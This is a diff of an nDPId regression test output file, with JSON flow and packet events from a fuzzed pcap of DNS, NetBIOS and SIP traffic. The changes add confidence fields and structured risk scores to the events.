 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470636050,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470636050,"pkt":"\/\/\/\/\/\/\/\/AODtAW5LCABFAJxOa4EAAIARSszAqAECwKgB\/wCJAIkAOltZhUIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFTkVPYkFDQUNBekFDQUJNAAAgAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXL8AAIARWOvAqAEpwKgB\/wCKAIoAtl+xEQKRTcCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAMEAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAAAA"}
-00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1120470657808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470657808,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMAAAIARWWbAuL0pwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUh2Q0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470657808,"flow_last_seen":1120470657808,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470657808,"l3_proto":"ip4","src_ip":"192.184.189.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1120470658556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470658556,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMEAAIARWWXAqAEpwKgB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0ElcwBMAAAgAAE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470658556,"flow_last_seen":1120470658556,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470658556,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1120470659308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470659308,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMIAAIARWWTAqAEpa6gB\/wCJAIkAOmgjkU8BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470659308,"flow_last_seen":1120470659308,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470659308,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"107.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1120470662062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMMAAIARWOfAqAEpwKgB\/wCKAIqWtl+uEQKRUMCoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBMEFDQUNBQUEAIEZIRVBGQ0dMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAABgAAAAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAQgAXAFxNQUlMU7xPVFxCUk9XU0UACQTYAAAA"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1120470662062,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470662062,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMQAAIARWSVzAAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJTAAAgAAE="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470662062,"flow_last_seen":1120470662062,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470662062,"l3_proto":"ip4","src_ip":"115.0.1.41","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1120470662812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470662812,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMUAAIARWWHAqAEpwKgB\/wCJAIkAOGggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUM1Q0FDQUNBQ0FDQUJMAAAgAAE="}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1120470663563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470663563,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAABOXMYAAIARWWDAqAEpwKgB\/wCJAIkAOmggkVIBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJMAAAgAAE="}
 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1120470666317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1120470666317,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADKXMcAAIARWOPAqAEpwKgB\/wCKAIoAtl+rEQKRU8CoASkAigCgAAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEQIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAEQAABgAAQAAAAAAAAOgDAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTYAM8A"}
@@ -1071,123 +1073,123 @@
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":475,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470667819,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1120470670573,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470670573,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFEABOXMsAAIARWVvAqAEpwKglcwCJAIkAOmUbkVcBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAAAgAAE="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470684110,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
